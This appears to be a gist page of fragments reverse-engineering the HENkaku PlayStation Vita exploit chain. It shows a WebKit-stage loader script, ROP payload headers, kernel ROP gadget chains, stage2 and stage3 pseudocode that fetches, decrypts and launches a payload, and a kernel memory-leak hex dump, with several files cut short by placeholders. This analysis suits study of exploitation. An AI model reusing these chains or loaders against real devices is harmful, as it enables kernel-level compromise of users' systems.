View henkaku_index.html
<script src='payload.js'></script> | |
<script> | |
var r, a, e, t, n, o, l, i, f, v, s, c; | |
var u, y, w, p, d, g, h, k, b; | |
var A, U; | |
var m = 0x40 + payload[16/4]; /* 0x40 bytes for ROP header + 1840 bytes for stack*/ | |
m /= 4; /* 476 */ | |
View henkaku_payload_bin.txt
[HEADER] (0x40 bytes) | |
0x524f507e -> ROP~ | |
0x01000100 -> Version | |
0x00000000 -> NULL | |
0x00000000 -> NULL | |
0x00000730 -> No reloc | |
0x00000000 -> NULL | |
0x00000000 -> NULL | |
0x00000000 -> NULL | |
0x000003F8 -> No reloc |
View henkaku_stage3_krop.txt
// Kernel ROP chain | |
/* | |
scesysmem_base + 0x00000347 | |
POP {PC} | |
*/ | |
0x00(x_stack + 0x00008A8C) = scesysmem_base + 0x00000031 // PC | |
/* | |
scesysmem_base + 0x00000031 | |
POP {R0,PC} |
View henkaku_stage2.c
// Copy SD card device path and param | |
strcpy(x_stack + 0x000086B4, "sdstor0:"); | |
strcpy(x_stack + 0x000086CC, "xmc-lp-ign-userext"); | |
// Clear devctl 0x05 outbuf | |
// From x_stack + 0x00006F34 to x_stack + 0x00007334 | |
memset(x_stack + 0x00006F34, 0x00000000, 0x00000400); | |
// Copy dummy device path | |
strcpy(x_stack + 0x000086E4, "molecule0:"); |
View henkaku_stage2_partial.c
strcpy(stack_base + 0x000086B4, "sdstor0:"); | |
strcpy(stack_base + 0x000086CC, "xmc-lp-ign-userext"); | |
// Do stuff | |
... | |
strcpy(stack_base + 0x000086E4, "molecule0:"); | |
SceLibKernel_a4ad("molecule0:"); | |
SceLibKernel_a55d("sdstor0:", 0x00000005, "xmc-lp-ign-userext", 0x00000014); |
View henkaku_http_loader.c
// Do stuff | |
... | |
// Create a new thread for the second payload | |
int thread_id = sceKernelCreateThread("st2", SceWebkit_base + 0x000054C8, 0x10000100, 0x00600000, 0x00000000, 0x00000000, 0x00000000); | |
// Do stuff | |
... | |
// Construct the arguments for fetching the second payload |
View henkaku_stage3_pseudocode.c
// Allocate a new memory block | |
char* memblock_name = "Magic"; | |
uint32_t memblock_type = 0x1020D006; | |
uint32_t memblock_size = 0xA0000; | |
void* memblock_opts = 0x00000000; | |
uint32_t memblock_id = kern_memblock_alloc(memblock_name, memblock_type, memblock_size, memblock_opts, 0); | |
// Retrieve the memory block's address into a buffer | |
uint32_t *out_buf; | |
kern_memblock_getaddr(memblock_id, out_buf); |
View henkaku_stage3_kxloader.c
// Entry point | |
sub_00000010(scesysmem_base, payload_addr) | |
{ | |
r4 = scesysmem_base | |
sub_00000356(); | |
r5 = scesysmem_base >> 0x20 | |
sub_0000035A(); | |
// Decrypt and launch HENkaku's payload |
View henkaku_stage2_rop.txt
0x00(x_stack + 0x00008A8C) = scesysmem_base + 0x00000031 | |
0x00(x_stack + 0x00008A90) = 0x08106803 | |
0x00(x_stack + 0x00008A94) = scesysmem_base + 0x0001EFF1 | |
0x00(x_stack + 0x00008A98) = 0x00000038 | |
0x00(x_stack + 0x00008A9C) = scesysmem_base + 0x0001EFE1 | |
0x00(x_stack + 0x00008AA0) = scesysmem_base + 0x00000347 | |
0x00(x_stack + 0x00008AA4) = scesysmem_base + 0x000039EB | |
0x00(x_stack + 0x00008AA8) = scesysmem_base + 0x0001B571 | |
0x00(x_stack + 0x00008AAC) = 0x00000000 | |
0x00(x_stack + 0x00008AB0) = scesysmem_base + 0x00001E43 |
View sceIoDevctl_leak_1.50.txt
0x00000000: 00 02 20 9F 80 05 08 00 E0 59 00 00 97 11 49 00 | |
0x00000010: A8 05 30 00 80 05 08 00 00 00 00 00 09 50 49 00 | |
0x00000020: 00 C9 21 00 00 C9 21 00 C0 8B 21 00 80 A5 21 00 | |
0x00000030: C0 8B 21 00 80 A5 21 00 00 B2 20 00 C0 65 20 00 | |
0x00000040: 00 B2 20 00 C0 65 20 00 C0 65 20 00 C0 65 20 00 | |
0x00000050: C0 65 20 00 C0 65 20 00 C0 21 20 00 C0 65 20 00 | |
0x00000060: C0 21 20 00 C0 65 20 00 00 47 20 00 00 47 20 00 | |
0x00000070: 00 47 20 00 00 47 20 00 C0 95 20 00 00 47 20 00 | |
0x00000080: C0 95 20 00 00 47 20 00 40 0B 20 00 40 0B 20 00 | |
0x00000090: 40 0B 20 00 40 0B 20 00 40 31 20 00 40 0B 20 00 |
OlderNewer